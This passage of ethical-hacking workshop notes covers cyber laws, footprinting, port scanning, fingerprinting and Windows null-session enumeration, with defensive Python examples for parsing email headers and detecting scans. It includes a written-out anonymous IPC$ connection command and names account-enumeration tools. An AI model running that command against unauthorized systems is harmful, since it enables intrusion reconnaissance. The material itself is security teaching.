ethical hacking workshop
TRANSCRIPT
Study Material by
Sponsored by
Disclaimer
Material provided here is compiled from different sources, and Technobuzz or Impeccable Trainers do not guarantee 100% accuracy of the information. If you find something wrong, then revert to us on
HACKING – The Art of Exploitation
1. INTRODUCTION TO ETHICAL HACKING
Hacking is the most exhilarating game on the planet. But it stops being fun when you end up in a
cell. Hacking doesn't have to mean breaking laws, though.
In this workshop we teach safe hacking, so that you don't have to keep looking back over your
shoulder for narks and cops.
What we're talking about is hacking as a healthy recreation, and as a free education that can qualify
you to get a high paying job. In fact, many network systems administrators, computer scientists
and computer security experts first learned their professions, not in some college program, but from
the hacker culture. And you may be surprised to discover that ultimately the Internet is safeguarded
not by law enforcement agencies, not by giant Corporations, but by a worldwide network of, yes,
HACKERS.
You too, can become one of us.
And Hacking can be surprisingly easy.
However, before you plunge into the hacker subculture, be prepared for that hacker attitude. You
have been warned.
So...welcome to the adventure of HACKING!
WHAT DO I NEED IN ORDER TO HACK?
You may wonder whether hackers need expensive computer equipment and a shelf full of technical
manuals. The answer is NO!
Hacking can be surprisingly easy! Better yet, if you know how to search the Web, you can find
almost any computer information you need for free.
In fact, hacking is so easy that if you have an on-line service and know how
to send and read email, you can start hacking immediately.
We see many hackers making a big deal of themselves and being mysterious and refusing to help
others learn how to hack. Why? Because they don't want you to know the truth, which is that most
of what they are doing is really very simple!
Well, we thought about this. We too, could enjoy the pleasure of insulting people who ask us how
to hack. Or we could get big egos by actually teaching thousands of people how to hack.
HOW NOT TO GET BUSTED?
One slight problem with hacking is that if you step over the line, you can go to jail. We will do our
best to warn you when we describe hacks that could get you into trouble with the law. But we are
not attorneys or experts on cyber law. In addition, every state and every country has its own laws.
And these laws keep on changing. So you have to use a little sense.
But the best protection against getting busted is the Golden Rule. If you are about to do
something that you would not like to have done to you, forget it. Do hacks that make the
world a better place, or that are at least fun and harmless, and you should be able to keep out
of trouble.
ETHICS AND LEGALITIES:
Nothing contained in this Cram Session is intended to teach or encourage the use of security tools or
methodologies for illegal or unethical purposes. Always act in a responsible manner. Make sure you
have written permission from the proper individuals before you use any of the tools or techniques
described in this Cram Session.
TERMINOLOGIES:
Exploit: According to the Jargon Dictionary, an exploit is defined as "a vulnerability in software that is
used for breaking security". Hackers rely on exploits to gain access to, or to escalate their privileged
status on, targeted systems.
SECURITY TRIANGLE (figure): CONFIDENTIALITY, INTEGRITY, AVAILABILITY; labelled SECURITY.
SOFTWARE TRIANGLE (figure): SECURITY, FUNCTIONALITY, EASY TO USE; labelled SOFTWARE.
ATTACKER'S PROCESS:
Attackers follow a fixed methodology. The steps involved in an attack are shown below:
Foot Printing
Scanning
Enumeration
Penetration (individuals that are unsuccessful at this step may opt for a Denial of Service attack)
Escalation of Privilege
Cover Tracks
Backdoors
RECONNAISSANCE:
Reconnaissance is one of the most important steps of the hacking process. Before an actual
Vulnerability can be exploited it must be discovered. Discovery of potential vulnerabilities is aided
by identification of the technologies used, operating systems installed, and services/applications that
are present.
Reconnaissance can broadly be classified into two categories:
Passive Reconnaissance
Active Reconnaissance
TYPES OF ATTACKS:
There are several ways in which hackers can attack your network. No matter which path of
opportunity they choose, their goal is typically the same: control and use of your network and its
resources.
LAN Attack
WAN Attack
Physical Entry
Stolen Equipment
Unsecured Wireless Access
Dialup Attack
CATEGORIES OF EXPLOITS:
An exploit is the act of taking advantage of a known vulnerability. When ethical hackers discover
new vulnerabilities, they usually inform the product vendor before going public with their findings.
This gives the vendor some time to develop solutions before the vulnerability can be exploited.
Some of the most common types of exploits involve: Program bugs, Buffer overflows, Viruses,
Worms, Trojan Horses, Denial of Service and Social Engineering.
GOALS OF HACKER:
While the type of attack may vary, the hacker will typically follow a set methodology. This
includes:
Reconnaissance
Gaining Access
Maintaining Access
Covering Tracks
ETHICAL HACKER & CRACKER:
Historically the term HACKER was not viewed in a negative manner. It referred to someone who enjoys
exploring the nuances of programs, applications and operating systems. The term CRACKER
usually refers to a "criminal hacker": a person who uses his skills for malicious intent.
Q. Who are Ethical Hackers?
Successful ethical hackers possess a variety of skills. First and foremost, they must be completely
trustworthy. Ethical hackers typically have very strong programming and computer networking
skills. They are also adept at installing and maintaining systems that use the more popular operating
systems (e.g., Linux or Windows) used on target systems. These base skills are augmented with
detailed knowledge of the hardware and software provided by the more popular computer and
networking hardware vendors.
CATEGORIES OF ETHICAL HACKER:
White Hat Hackers – perform ethical hacking to help secure companies and organizations.
Reformed Black Hat Hackers – claim to have changed their ways and that they can bring special
insight into the ethical hacking methodology.
Gray Hats – individuals who work both offensively and defensively according to the situation.
NEED OF INFORMATION TECHNOLOGY IN WORLD:
Security compliance is a must for all companies with an IT backbone. The requirement is high for
organizations in the IT / ITES segment. Information workers lack basic security knowledge.
Information security training is being offered to professionals in IT security.
BENEFITS OF INFORMATION TECHNOLOGY:
Be an Information Security Professional.
Prepare for the hacking threats of tomorrow.
Secure desktops and LANs from crackers.
Understand attacks via viruses, worms and Trojans, and how to prevent them.
Implement IDS.
Understand technical attacks like DDoS and SQL injection, and take precautions.
Secure your sensitive data using cryptography and steganography.
Secure your emails and take precautions against email attacks.
Understand the various levels at which you might get hacked.
Stop cyber terrorism.
Use Google as an aid to information security.
Carry out cyber investigations and computer forensics.
Understand mobile security and related problems.
Learn and implement router security.
TYPES OF TESTING/EVALUATION:
Internal Evaluation
External Evaluation
Stolen Equipment Evaluations
2. CYBER ETHICS
COMPUTER CRIME:
The United States Department of Justice defines computer crime as "any violation of criminal law
that involved the knowledge of computer technology for its perpetration, investigation, or
prosecution."
VARIOUS LAWS:
Spy Act
U.S Federal Laws
United Kingdom's Cyber Laws
European Laws
Japan's Cyber Laws
Australia: The Cyber Crime Act 2001
Indian Law: The Information Technology Act
Germany's Cyber Law
Singapore's Cyber Law
Belgium Law
Brazilian Law
Canadian Law
France Law
Italian Law
"CYBER CRIME" is an amorphous field. It refers broadly to any criminal activity that pertains to
or is committed through the use of the Internet. A wide variety of conduct fits within this capacious
definition. We will concentrate on five activities that have been especially notorious and that have
put especially serious strain on the fabric of traditional criminal law: use of the Internet to threaten or
stalk people; ONLINE FRAUD; "HACKING"; ONLINE DISTRIBUTION OF CHILD
PORNOGRAPHY; and CYBERTERRORISM.
CYBER STALKERS:
"Stalkers harness the tremendous power of the Web to learn about their prey and to
broadcast false information about the people they target. And the Internet - the same
tool they use to investigate and spread terror - provides stalkers with almost
impenetrable anonymity." In cyberspace, stalking and harassment may occur via e-mail
and through user participation in news groups, bulletin boards, and chat rooms. One major
difference from off-line stalking is that cyberstalkers can also dupe other Internet users into
harassing or threatening victims.
The term "CYBERSTALKING" has been coined to refer to the use of the Internet, e-mail,
or other electronic communications devices to stalk another person. Because of the
emerging nature of this form of stalking, the available evidence of cyberstalking is still
largely anecdotal, but it suggests that the majority of cyberstalkers are men and the
majority of their victims are women. As in off-line stalking, in many on-line cases, the
cyberstalker and the victim had a prior relationship, and when the victim attempts to end
the relationship, the cyberstalking begins.
IT ACT 2000(Information Technology Act-2000):
Sec -66. Hacking with computer system.
(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful
loss or damage to the public or any person destroys or deletes or alters any
information residing in a computer resource or diminishes its value or utility or
affects it injuriously by any means, commits hack.
(2) Whoever commits hacking shall be punished with imprisonment up to three years,
or with a fine which may extend up to two lakh rupees, or with both.
Sec-67. Publishing of information which is obscene in electronic form.
Whoever publishes or transmits or causes to be published in the electronic form, any
material which is lascivious or appeals to the prurient interest or if its effect is such as
to tend to deprave and corrupt persons who are likely, having regard to all relevant
circumstances, to read, see or hear the matter contained or embodied in it, shall be
punished on first conviction with imprisonment of either description for a term which
may extend to five years and with fine which may extend to one lac rupees and in the
event of a second or subsequent conviction with imprisonment of either description
for a term which may extend to ten years and also with fine which may extend to two
lacs rupees.
Sec-65.Tampering with computer source documents.
Whoever knowingly or intentionally conceals, destroys or alters or intentionally or
knowingly causes another to conceal, destroy or alter any computer source code used
for a computer, computer programme, computer system or computer network, when
the computer source code is required to be kept or maintained by law for the time
being in force, shall be punishable with imprisonment up to three years, or with fine
which may extend up to two lacs rupees, or with both.
Sec-43. Penalty for damage to computer, computer system, etc.
If any person without permission of the owner or any other person who is in charge of
a computer, computer system or computer network,-
(a) Accesses or secures access to such computer, computer system or computer
network;
(b) Downloads, copies or extracts any data, computer data base or information from
such computer, computer system or computer network including information or
data held or stored in any removable storage medium;
(c) Introduces or causes to be introduced any computer contaminant or computer
virus into any computer, computer system or computer network;
(d) Damages or causes to be damaged any computer, computer system or computer
network, data, computer data base or any other programs residing in such
computer, computer system or computer network;
(e) Disrupts or causes disruption of any computer, computer system or computer
network;
(f) Denies or causes the denial of access to any person authorized to access any
computer, computer system or computer network by any means;
(g) Provides any assistance to any person to facilitate access to a computer, computer
system or computer network in contravention of the provisions of this Act, rules
or regulations made there under;
(h) charges the services availed of by a person to the account of another person by
tampering with or manipulating any computer, computer system, or computer
network, he shall be liable to pay damages by way of compensation not
exceeding one crore rupees to the person so affected.
TRAFFICKING:
"Trafficking in counterfeit label for phone records, copies of computer programs or
computer program documentation or packaging, and copies of motion pictures or
other audio visual works."
Law is applicable if:
Persons knowingly traffics in a counterfeit label affixed or designed to be affixed.
Intentionally traffics a counterfeit document or packaging for a computer program.
Penalty:
Fine and Imprisonment is imposed.
3. INFORMATION GATHERING & SCANNING
FOOTPRINTING:
Footprinting is the process of gathering as much information about an organization as possible. The
objective of footprinting is to gather this information in such a way as to not alert the organization.
This information is publicly available from third parties and from the organization itself.
WEB BASED TOOLS:
Many web-based tools are available to help uncover domain information. These services provide
whois information, DNS information, and network queries.
Eg:
Sam Spade http://www.samspade.org
Geek Tools http://www.geektools.com
Betterwhois http://betterwhois.com
Dshield http://www.dshield.org
IANA
The Internet Assigned Number Authority is a nonprofit organization that is responsible for
preserving the central functions of the global Internet for the public good. IANA is a good starting
point for determining details about a domain. IANA lists all the top level domains of each country
and their associated technical and administrative contacts. Most of the associated domains will
allow you to search by the domain name.
RIRs
Regional Internet Registries are granted authority by ICANN to allocate IP address blocks within
their respective geographical areas. These databases are an excellent resource for further
research on a domain once you have determined what area of the world it is located in.
Domain Location and Path Discovery
If you are unsure of a domain's location, the best way to determine it is by use of the
traceroute command. Traceroute determines a path to a domain by incrementing the TTL field of
the IP header. When the TTL reaches zero at a router, that router generates an ICMP (Time Exceeded)
message. These ICMP messages identify each particular hop on the path to the destination. There are
several good GUI-based traceroute tools available. These tools draw a visual map that displays the
path and destination. NeoTrace and VisualRoute are two GUI-based tools that map path and destination.
ARIN, RIPE AND Regional Databases
RIRs are searchable by IP address. If you have the domain name, you can resolve it to the IP by
pinging the domain name. The RIRs and their areas of control include:
American Registry for Internet Numbers (ARIN)
Réseaux IP Européens Network Coordination Centre (RIPE)
Asia Pacific Network Information Center (APNIC)
African Regional Internet Registry (AFRINIC)
Latin American and Caribbean Network Information Center (LACNIC)
Determining the Network Range
You can query the RIR to find out what network range the organization owns. If you chose the
wrong RIR, you will typically receive an error message that will point you to the correct record
holder.
Discovering the Organization's Technology
There are many ways in which individuals can passively determine the technology an organization
uses. Some examples are JOB BOARDS and GOOGLE GROUPS.
Email Tips & Tricks
The Simple Mail Transfer Protocol is used for sending Email. Every Email you receive has a
header that contains information such as the IP address of the server sending the message, the
names of any attachments included with the Email and the time and date the Email was sent and
received.
Bouncing Email
One popular technique is to send an email to an invalid email address. The sole purpose of this
activity is to examine the SMTP header that will be returned. This may reveal the email server's IP
address, application type and version. Another way to track interesting email is to use software
that will allow you to verify where the email originated and how the recipient handled it, such as
emailtraking pro and mailTracking.com.
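As an added example (not code from the original study material), the following Python reads the header fields described above from a constructed message: it lists the Received hops in delivery order so that the first relay's view of the sending host comes first, pulls out attachment file names, and compares the client-supplied Date header with the first relay's timestamp. The message, host names and addresses are constructed from documentation ranges, not a real capture.

```python
import email
import re
from email import policy
from email.utils import parsedate_to_datetime

# Constructed sample message (not a real capture). Hosts and IPs are
# placeholders from documentation ranges. Received headers are read from
# the bottom up: the lowest one was added by the first relay to handle it.
RAW_MESSAGE = b"""Received: from mx.example.net (mx.example.net [203.0.113.10])
\tby inbox.example.org with ESMTP id abc123;
\tTue, 3 Jun 2008 10:15:02 +0000
Received: from mail.example.com (mail.example.com [198.51.100.25])
\tby mx.example.net with ESMTP id xyz789;
\tTue, 3 Jun 2008 10:14:58 +0000
Received: from [192.0.2.77] (unknown [192.0.2.77])
\tby mail.example.com with SMTP;
\tTue, 3 Jun 2008 10:14:55 +0000
From: sender@example.com
To: someone@example.org
Subject: report
Date: Tue, 3 Jun 2008 10:14:50 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/plain

see attached
--B1
Content-Type: application/octet-stream; name="report.exe"
Content-Disposition: attachment; filename="report.exe"

MZ
--B1--
"""

BRACKET_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
BY_HOST = re.compile(r"\bby\s+(\S+)")


def _parse(raw):
    return email.message_from_bytes(raw, policy=policy.default)


def received_hops(raw):
    """Return the Received hops oldest-first: IP of the handing-off host,
    name of the relay that wrote the header, and the header's timestamp."""
    hops = []
    for hdr in reversed(_parse(raw).get_all("Received", [])):
        text = str(hdr)
        ip = BRACKET_IP.search(text)
        by = BY_HOST.search(text)
        stamp = parsedate_to_datetime(text.rsplit(";", 1)[-1].strip())
        hops.append({"ip": ip.group(1) if ip else None,
                     "by": by.group(1) if by else None,
                     "time": stamp})
    return hops


def origin_ip(raw):
    """IP recorded by the first relay, i.e. the sending host as that relay saw it."""
    hops = received_hops(raw)
    return hops[0]["ip"] if hops else None


def attachment_names(raw):
    """File names of every attachment part."""
    return [part.get_filename() for part in _parse(raw).iter_attachments()]


def date_vs_first_hop_seconds(raw):
    """Seconds between the client-supplied Date header and the first relay's
    timestamp; a large or negative gap suggests the Date header was forged."""
    msg = _parse(raw)
    sent = parsedate_to_datetime(str(msg["Date"]))
    first = received_hops(raw)[0]["time"]
    return (first - sent).total_seconds()


if __name__ == "__main__":
    for hop in received_hops(RAW_MESSAGE):
        print(f"{hop['ip']!s:16} -> {hop['by']}  at {hop['time']}")
    print("origin:", origin_ip(RAW_MESSAGE))
    print("attachments:", attachment_names(RAW_MESSAGE))
    print("date skew (s):", date_vs_first_hop_seconds(RAW_MESSAGE))
```

Only the topmost Received header (written by your own server) is trustworthy; everything below it was supplied by earlier relays and can be forged, so the origin IP is a lead for an investigation, not proof.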
SCANNING:
Once a hacker has moved to the scanning phase, his goal will be to identify active systems. There are
several ways this identification can take place. The methods of identifying active systems
include:
War Dialing
War Driving
Pinging
Port Scanning
Regardless of the method chosen the goal is still the same:
Identify that the system is live
Determine its services
Verify its OS
Pinpoint its vulnerabilities
War Dialing
While some may see war dialing as a dated art, it still has its place in the hacker's arsenal of tools.
If a thorough footprint has been performed, phone numbers were most likely found that can be
associated to the organization. The numbers can serve as a starting point for war dialing scans.
The hacker's goal will be to uncover modems that may have been left open. Administrators may
have configured these for out-of-band management. The goal of an ethical hacker is to uncover
these devices during the security audit to make sure they are removed, as modems offer a way to
bypass the corporate firewall. The tools most commonly used for war dialing include: THC-Scan,
PhoneSweep War Dialer and Telesweep.
War Driving
This mode of penetration relies on finding unsecured wireless access points. A popular tool used
for this operation is Netstumbler.
ICMP – Ping
Using the ping command is one of the easiest ways to determine if a system is reachable. Ping is
actually an ICMP(Internet Control Message Protocol) echo request-response. Its original purpose
was to provide diagnostic abilities to determine whether a network or device was reachable. The
important thing to remember about ping is that just because a system does not respond to ping, that
doesn't mean that it is not up. It might simply mean that ICMP type 0 and/or type 8 messages have
been blocked by the target organization. There are many tools available that can be used to
automate the ping process. These tools will typically ping sweep an entire range of addresses.
Some of these include: Pinger, Friendly Pinger, WS_Ping_Pro, NetScan Tools Pro 2000,
Hping2, and KingPing.
Detecting Ping Sweeps
Most IDS systems, such as SNORT, will detect ping sweeps. While performing a ping sweep is
not illegal, it should alert an administrator, as it is generally part of the pre-attack phase.
Port Scanning
Port scanning allows a hacker to determine what services are running on the systems that have been
identified. If vulnerable or insecure services are discovered, the hacker may be able to exploit
these to gain unauthorized access. There are a total of 65,535 * 2 ports (TCP & UDP). While a
complete scan of all these ports may not be practical, an analysis of popular ports should be
performed. Many port scanners ping first, so make sure to turn this feature off to avoid missing
systems that have blocked ICMP. Popular port scanning programs include: Nmap, Netscan Tools,
Superscan and Angry IP Scanner.
TCP Basics
As TCP is a reliable service, a 3-step startup (the three-way handshake) is performed before data is
transported. ACKs are sent to acknowledge data transfer and a four-step shutdown is completed at the
end of a communications session. TCP uses flags (Urgent, Acknowledgement, Push, Reset, Synchronize,
and Finish) to accomplish these tasks. Port scanners manipulate these flag settings to bypass
firewalls and elicit responses from targeted systems.
TCP Scan Types
Most port scanners make full TCP connections. Stealth scanners do not make full connections
and may not be detected by some IDS systems. Nmap is one of the most popular port scanners.
Some common types of port scans are: Ping Scan, SYN Scan, Full Scan, ACK Scan and XMAS
Scan.
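Added example, not from the original material: a small Python decoder for the TCP flag byte, plus a classifier that names the flag combinations an IDS signature would associate with the scan types listed above (SYN, ACK, XMAS, and the NULL case of no flags at all). The 20-byte headers are constructed with struct so the parser can be exercised offline; the port numbers are placeholders.

```python
import struct

# Bit positions of the six classic TCP flags in the header's flag byte.
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04,
             "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

# Flag combinations an IDS signature would map to the scan types named above.
# Normal traffic never sends FIN+PSH+URG together or an empty flag byte, so
# those are unambiguous; a lone SYN is also the first packet of any legitimate
# connection, so it only becomes a scan when repeated across many ports.
PROBE_SIGNATURES = {
    frozenset({"SYN"}): "SYN scan / connect start",
    frozenset({"ACK"}): "ACK scan (firewall rule mapping)",
    frozenset({"FIN", "PSH", "URG"}): "XMAS scan",
    frozenset(): "NULL scan",
}


def decode_flags(flag_byte):
    """Return the set of flag names set in a TCP flag byte."""
    return {name for name, bit in TCP_FLAGS.items() if flag_byte & bit}


def classify_probe(flag_byte):
    """Name the probe type for a flag combination, or 'other' for anything
    that does not match a known scan signature (e.g. a SYN+ACK reply)."""
    return PROBE_SIGNATURES.get(frozenset(decode_flags(flag_byte)), "other")


def parse_tcp_header(segment):
    """Parse the fixed 20-byte TCP header (RFC 793 layout) from raw bytes."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    src, dst, seq, ack, off_res, flags, win, csum, urg = struct.unpack(
        "!HHIIBBHHH", segment[:20])
    return {
        "src_port": src,
        "dst_port": dst,
        "seq": seq,
        "data_offset": off_res >> 4,      # header length in 32-bit words
        "flags": decode_flags(flags),
        "probe": classify_probe(flags),
    }


def build_segment(src_port, dst_port, flag_byte):
    """Constructed helper: pack a minimal header so the parser can be
    exercised offline (zero checksum, no options)."""
    return struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4,
                       flag_byte, 1024, 0, 0)


if __name__ == "__main__":
    # Constructed samples: an XMAS probe, a NULL probe and a normal SYN+ACK reply.
    for name, seg in [("xmas", build_segment(40000, 80, 0x29)),
                      ("null", build_segment(40001, 80, 0x00)),
                      ("syn-ack", build_segment(80, 40000, 0x12))]:
        info = parse_tcp_header(seg)
        print(f"{name}: flags={sorted(info['flags'])} -> {info['probe']}")
```

The signature table is the point: XMAS and NULL are detectable from a single packet because no RFC-conformant stack ever sends those combinations, whereas SYN and ACK probes look like ordinary traffic one packet at a time and have to be detected by counting.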
UDP Basics
UDP is a connectionless protocol. If ICMP has been blocked at the firewall, it can be much harder
to scan for UDP ports than TCP ports, as there may be no returned response. Just as with TCP,
hackers will look for services that can be exploited such as chargen, daytime, tftp, and echo. One
of the best UDP and TCP port scanners is Nmap.
Nmap (network mapper) is an open source port scanner that has the capability to craft
packets in many different ways. This allows the program to determine what services an OS is
running.
Port Scan Countermeasures
Practice the principle of least privilege. Don't leave unneeded ports open, and block ICMP echo
requests at the firewall or external router. Allow traffic through the external router only to specific
hosts.
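Added example, not from the original material, serving both the "Detecting Ping Sweeps" note above and the port scanning section: a Python detector that reads constructed firewall log lines and raises one alert per offender when a single source sends ICMP echo requests (type 8) to many distinct hosts, or SYN-only segments to many distinct ports on one host, inside a sliding time window. The log format, addresses and thresholds are assumptions made for this example; a real SNORT or firewall deployment would supply its own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log format (constructed for this example, not any vendor's):
#   <ISO time> <ALLOW|DROP> <ICMP|TCP|UDP> <src> -> <dst>[:<port>] [type=N] [flags=X]
LINE = re.compile(
    r"^(\S+) (ALLOW|DROP) (ICMP|TCP|UDP) (\S+) -> ([\d.]+)(?::(\d+))?"
    r"(?: type=(\d+))?(?: flags=(\S+))?$")


def parse_line(line):
    m = LINE.match(line)
    if not m:
        return None  # skip lines that do not fit the format
    ts, action, proto, src, dst, port, icmp_type, flags = m.groups()
    return {"time": datetime.fromisoformat(ts), "action": action, "proto": proto,
            "src": src, "dst": dst, "port": int(port) if port else None,
            "icmp_type": int(icmp_type) if icmp_type else None, "flags": flags}


def detect(lines, sweep_hosts=10, scan_ports=10, window=timedelta(seconds=60)):
    """Alert once per offender when, inside `window`, one source pings at least
    `sweep_hosts` distinct hosts, or sends SYNs to at least `scan_ports` distinct
    ports on one host. The thresholds are assumptions to tune per network."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["time"])
    recent = defaultdict(deque)   # key -> deque of (time, item) inside the window
    flagged, alerts = set(), []
    for e in events:
        if e["proto"] == "ICMP" and e["icmp_type"] == 8:        # echo request
            key, item, limit, kind = ("sweep", e["src"]), e["dst"], sweep_hosts, "ping sweep"
        elif e["proto"] == "TCP" and e["flags"] == "S":          # SYN only
            key, item, limit, kind = ("scan", e["src"], e["dst"]), e["port"], scan_ports, "port scan"
        else:
            continue
        q = recent[key]
        q.append((e["time"], item))
        while e["time"] - q[0][0] > window:   # drop entries older than the window
            q.popleft()
        distinct = {x for _, x in q}
        if len(distinct) >= limit and key not in flagged:
            flagged.add(key)
            alerts.append({"kind": kind, "source": key[1],
                           "target": key[2] if kind == "port scan" else None,
                           "count": len(distinct), "at": e["time"].isoformat()})
    return alerts


def _t(seconds):
    return (datetime(2008, 6, 3, 10, 15, 0) + timedelta(seconds=seconds)).isoformat()


# Constructed sample log: one source pinging twelve hosts, another SYN-probing
# eleven ports on one host, plus a benign client doing one ping and one connection.
LOG_LINES = (
    [f"{_t(i)} DROP ICMP 203.0.113.5 -> 10.0.0.{i + 1} type=8" for i in range(12)]
    + [f"{_t(20 + i)} DROP TCP 198.51.100.9 -> 10.0.0.17:{p} flags=S"
       for i, p in enumerate([21, 22, 23, 25, 80, 110, 135, 139, 443, 445, 3389])]
    + [f"{_t(5)} ALLOW ICMP 192.0.2.50 -> 10.0.0.1 type=8",
       f"{_t(6)} ALLOW TCP 192.0.2.50 -> 10.0.0.17:443 flags=S",
       f"{_t(7)} ALLOW TCP 192.0.2.50 -> 10.0.0.17:443 flags=A"]
)

if __name__ == "__main__":
    for alert in detect(LOG_LINES):
        print(alert)
```

Counting distinct targets rather than raw packets is what keeps a chatty but legitimate client from tripping the rule; the benign 192.0.2.50 source in the sample never appears in the alerts even though it sends both an echo request and a SYN.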
Fingerprinting
Fingerprinting is the process of determining the OS that is running on the
target system.
I. Active Stack Fingerprinting-
Active stack fingerprinting relies on subtle differences in the responses to specially
crafted packets. The most well-known program used for active stack fingerprinting is
Nmap; its -O option is used for fingerprinting. For a reliable prediction, one open
port and one closed port are required.
II. Passive Stack Fingerprinting-
Passive fingerprinting is less reliable than active fingerprinting. Its primary advantage
is that it is stealthy. It relies on capturing packets sent from the target system.
Banner Grabbing
Banner grabbing is used to identify services. Banner grabbing works by making connections to the
various services on a host and looking at the response to hopefully determine the exact service and
version running on that port. Once these services are confirmed, this information can help to
identify possible vulnerabilities and the OS that the system is running. Netcraft, Telnet and FTP
are some of the common tools used to grab banners.
Identifying Vulnerabilities
Once a hacker has completed the scanning steps described in this section, he will attempt to
identify vulnerabilities. Vulnerabilities are typically flaws or weaknesses in the software or the
OS. Vulnerabilities lead to risk and this presents a threat to the target being scanned. Three terms
to remember include:
Vulnerability - A flaw or weakness in software.
Risk - The likelihood of a threat exploiting a vulnerability such that a hacker will be allowed
unauthorized access or create a negative impact.
Threat - The potential for a hacker to use a vulnerability.
Enumeration:
Enumeration is the process of identifying each domain that is present within the LAN. These
domains are typically identified using built-in Windows commands. The "net" command is the
most widely used of these commands. Once the various domains have been identified, each host
can be further enumerated to uncover its role. Likely targets of malicious hackers include: PDCs,
dual-homed computers, database servers, and web servers. The very act of Windows
enumeration is possible because these computers advertise themselves via browse lists. To see a
good example of this technology, take a look at Network Neighborhood on Windows systems.
These services are identifiable by the ports that can be found while performing the network scans
that were discussed in the previous section. The ports associated with these services are as follows:
135 – MS-RPC Endpoint Mapper
137 – NetBIOS Name Service
138 – NetBIOS Datagram Service
139 – NetBIOS Session Service
445 – SMB over TCP/IP (Windows 2K and above)
NetBIOS Null Sessions
Once individual computers are identified, malicious hackers will next attempt to discover the role
of the system by using NetBIOS Null Sessions. The legitimate purpose of a Null Session is to
allow unauthenticated computers to obtain browse lists from servers, allow system accounts access
to network resources, or to allow a null session pipe. A null session pipe is used when a process on
one system needs to communicate with a process on another system. Legitimate null sessions are
established over the IPC$ share.
The Inter-Process Communication Share
Windows computers communicate with each other over the IPC$ "Inter-Process
Communication" share. It is used for data sharing between applications and computers. In
Windows NT and 2000 computers, it is on by default. You can think of IPC$ as the pipeline that
facilitates file and print sharing. This is a huge vulnerability as hackers can connect to your IPC$
share using the net use command (net use \\IP\IPC$ "" /u:""). Once this connection has been
made, many types of sensitive information can be retrieved, such as user names, comments,
shares, and logon policies. What is most alarming about this vulnerability is that the attacker is
able to logon with a null username and null password.
NBTSTAT
The NBTSTAT command can be used to further identify the services that are running on a
particular system. For a listing of the type codes and their corresponding service, visit the following
link:
http://jcifs.samba.org/src/docs/nbtcodes.html
Active Directory Enumeration
To perform an Active Directory enumeration, you must have access to port 389 (LDAP Server).
You must also be able to authenticate yourself as a guest or user. Then, if these conditions are met,
enumeration of users and groups can proceed. Removing compatibility with pre-Windows 2000
computers during the installation of Active Directory can prevent this vulnerability.
Identifying Win2000 Accounts
Every object in Windows has a unique security identifier (SID). The SID is made up of two parts.
The first part identifies the domain and is unique to it. The second part is a descriptor of the
specific account. This second part is referred to as the relative identifier (RID). These follow a
specific order and are tied to unique roles within the domain. RIDs are defined as follows:
Account RID
Administrator 500
Guest 501
Domain users 1000 (and up)
So, while some administrators may promote the practice of "security through obscurity" and rename
accounts such as Administrator, the RID of the account will remain unchanged. Tools such as
USER2SID and SID2USER can be used to determine the true administrator account of the
domain.
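Added example, not from the original material: a Python SID parser that splits the domain identifier from the RID and audits a constructed account list the way a defender would, reporting which account actually holds RID 500 whatever it has been renamed to, and which "Administrator" is only a decoy created after install. The domain SID and account names are constructed placeholders.

```python
# Well-known RIDs named in the table above; 1000 and up are assigned to
# accounts and groups created after installation.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}


def parse_sid(sid):
    """Split a textual SID (S-1-<authority>-<sub-authorities...>-<RID>) into
    the domain part (everything before the last hyphen) and the RID."""
    parts = sid.split("-")
    if (len(parts) < 4 or parts[0] != "S" or parts[1] != "1"
            or not all(p.isdigit() for p in parts[2:])):
        raise ValueError(f"not a well-formed SID: {sid!r}")
    return {"domain": "-".join(parts[:-1]), "rid": int(parts[-1])}


def describe_rid(rid):
    """Role implied by the RID alone, independent of the account's name."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    return "created after install" if rid >= 1000 else "other well-known RID"


def audit_accounts(accounts):
    """accounts: iterable of (name, sid). Returns human-readable findings."""
    findings = []
    domains = set()
    for name, sid in accounts:
        parsed = parse_sid(sid)
        domains.add(parsed["domain"])
        rid = parsed["rid"]
        if rid == 500 and name.lower() != "administrator":
            findings.append(f"{name}: RID 500, this is the real Administrator despite the rename")
        elif rid != 500 and name.lower() == "administrator":
            findings.append(f"{name}: RID {rid}, decoy account, not the built-in Administrator")
    if len(domains) > 1:
        findings.append(f"accounts span {len(domains)} domain SIDs; check for foreign SIDs")
    return findings


# Constructed sample (placeholder domain SID, not from any real system).
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
ACCOUNTS = [
    ("svc_backup", f"{DOMAIN}-500"),      # renamed built-in Administrator
    ("Administrator", f"{DOMAIN}-1104"),  # decoy created after install
    ("Guest", f"{DOMAIN}-501"),
    ("jsmith", f"{DOMAIN}-1001"),
]

if __name__ == "__main__":
    for name, sid in ACCOUNTS:
        rid = parse_sid(sid)["rid"]
        print(f"{name:15} RID {rid:5} {describe_rid(rid)}")
    for line in audit_accounts(ACCOUNTS):
        print("finding:", line)
```

The same logic is why renaming the built-in account is weak as a control on its own: anyone who can map names to SIDs sees RID 500 immediately, so the rename should be paired with the null session restrictions described below rather than relied on.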
DumpSec
DumpSec is another tool that will allow for account enumeration. Once a null session has been
established, this GUI tool will display information on users, account data, shares, and account
policies.
Null Session Countermeasures
Disable File and Print sharing. Inside network properties, under Advanced Settings, disable
NetBIOS over TCP/IP. Null sessions require access to ports 135-139 or 445. Blocking access to
these ports will also prevent these exploits. There is also a setting in Settings -> Control Panel ->
Administrative Tools –> Local Security Policy –> Local Policies –> Security Options –>
Restrict Anonymous. In Windows 2000, this registry key has three possible settings:
0 – No Restrictions
1 - Allow null sessions but disallow account enumeration
2 - No null sessions are allowed
The default setting is "0". A setting of "2" should be verified on a test network before use in a
production setting, as some older or custom applications may not function properly with it.
Account Enumeration
Account enumeration is a further probing of accounts. Before a concerted attack can take place,
account policies and shares must be uncovered. As well, before attempting to connect to an active
